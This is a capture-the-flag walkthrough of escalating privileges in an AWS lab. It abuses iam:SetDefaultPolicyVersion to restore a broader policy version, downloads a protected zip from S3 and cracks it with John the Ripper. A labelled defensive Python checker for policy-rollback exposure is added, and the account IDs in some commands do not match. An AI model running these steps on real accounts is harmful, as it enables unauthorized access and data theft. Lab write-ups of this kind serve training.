Escalate Privileges by IAM Policy Rollback

A walkthrough demonstrating how to abuse the IAM permission: SetDefaultPolicyVersion

CTF Source: Pwned Labs

Overview

In this walkthrough, we're provided access keys for an Intern with seemingly little access, but we find a way to escalate our privileges and obtain access to sensitive data!

Pre-Requisites

  • Install awscli: brew install awscli (mac) or apt install awscli (linux)

  • Install JohnTheRipper: brew install john (mac) or apt install john (linux)

Walkthrough

After configuring our AWS access keys (aws configure), let's begin to enumerate our access.

This command tells us who we are.

aws sts get-caller-identity

{
    "UserId": "AIDA4C7XGDAETYJA6EVGF",
    "Account": "831057696777",
    "Arn": "arn:aws:iam::831057696777:user/intern01"
}

We can then list policies attached to this user.

aws iam list-attached-user-policies --user-name intern01

{
    "AttachedPolicies": [
        {
            "PolicyName": "intern_policy",
            "PolicyArn": "arn:aws:iam::214768663777:policy/intern_policy"
        }
    ]
}

Let's see if we have multiple versions of this policy.

aws iam list-policy-versions --policy-arn arn:aws:iam::214768663777:policy/intern_policy

{
    "Versions": [
        {
            "VersionId": "v2",
            "IsDefaultVersion": true,
            "CreateDate": "2024-03-14T23:00:42+00:00"
        },
        {
            "VersionId": "v1",
            "IsDefaultVersion": false,
            "CreateDate": "2024-03-14T23:00:41+00:00"
        }
    ]
}

We can view both policies like so: aws iam get-policy-version --policy-arn arn:aws:iam::214768663777:policy/intern_policy --version-id v1 (or v2).

aws iam get-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1

{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "ec2:DescribeInstances",
                        "s3:ListAllMyBuckets",
                        "s3:GetObject",
                        "s3:ListBucket"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2024-03-14T21:43:51+00:00"
    }
}

Escalating Privileges

The v1 version of the policy grants additional S3 permissions over all resources. We'll make it the default version of the policy.

aws iam set-default-policy-version --policy-arn arn:aws:iam::831057696777:policy/intern_policy --version-id v1
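From the defender's side, the exposure to check for is any non-default policy version that allows more than the current default. The following Python script is an added example, not part of the original walkthrough: it takes policy versions in the shape returned by aws iam get-policy-version and reports, per non-default version, the Allow actions a rollback would newly grant. The sample documents are constructed, and the v2 contents are an assumption since the page only shows v1.

```python
import json

# Constructed sample in the shape returned by `aws iam get-policy-version`,
# one entry per version. The v2 document is an assumption: the page only
# states that v1 adds S3 permissions beyond the default.
SAMPLE_VERSIONS = [
    {"VersionId": "v2", "IsDefaultVersion": True,
     "Document": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Resource": "*",
          "Action": ["ec2:DescribeInstances", "s3:ListAllMyBuckets"]}]}},
    {"VersionId": "v1", "IsDefaultVersion": False,
     "Document": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Resource": "*",
          "Action": ["ec2:DescribeInstances", "s3:ListAllMyBuckets",
                     "s3:GetObject", "s3:ListBucket"]}]}},
]


def allowed_actions(document):
    """Collect every action named in Allow statements of a policy document.
    Wildcards such as "s3:*" are kept as literal strings, not expanded, so
    a broad default may still mask narrower extras in an older version."""
    actions = set()
    statements = document.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        acts = stmt.get("Action", [])
        if isinstance(acts, str):  # Action may be a string or a list
            acts = [acts]
        actions.update(acts)
    return actions


def rollback_exposure(versions):
    """Return {version_id: sorted actions} for each non-default version whose
    Allow actions exceed the default, i.e. what iam:SetDefaultPolicyVersion
    pointed at that version would newly grant."""
    default = next(v for v in versions if v["IsDefaultVersion"])
    baseline = allowed_actions(default["Document"])
    exposure = {}
    for v in versions:
        if v["IsDefaultVersion"]:
            continue
        extra = allowed_actions(v["Document"]) - baseline
        if extra:
            exposure[v["VersionId"]] = sorted(extra)
    return exposure


if __name__ == "__main__":
    print(json.dumps(rollback_exposure(SAMPLE_VERSIONS), indent=2))
```

Any version reported here should be deleted (or the policy re-created) and the principal's ability to call iam:SetDefaultPolicyVersion reviewed.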

If we list the buckets in the account, we'll find one and download the data.

aws s3 ls

2024-03-14 15:43:52 huge-logistics-data-8344bf3ad538

aws s3 cp s3://huge-logistics-data-8344bf3ad538/amex-export.zip .

download: s3://huge-logistics-data-8344bf3ad538/amex-export.zip to ./amex-export.zip

Password Cracking

Unfortunately, the file is password-protected.

unzip amex-export.zip

Archive:  amex-export.zip
[amex-export.zip] amex-export.json password:   

Not to worry as we can attempt to crack the password.

We'll create a hash and save it to a new file.

zip2john amex-export.zip > hash.txt

Next, we'll use JohnTheRipper and the classic rockyou.txt password list.

john hash.txt --wordlist=rockyou.txt

1logistics       (amex-export.zip)

Finding the Flag!

We found the password! Unzipping the file with it reveals the flag!

unzip -P 1logistics amex-export.zip

Archive:  amex-export.zip
  inflating: amex-export.json        
 extracting: flag.txt  

Get the final flag.

cat flag.txt

<flagHash>
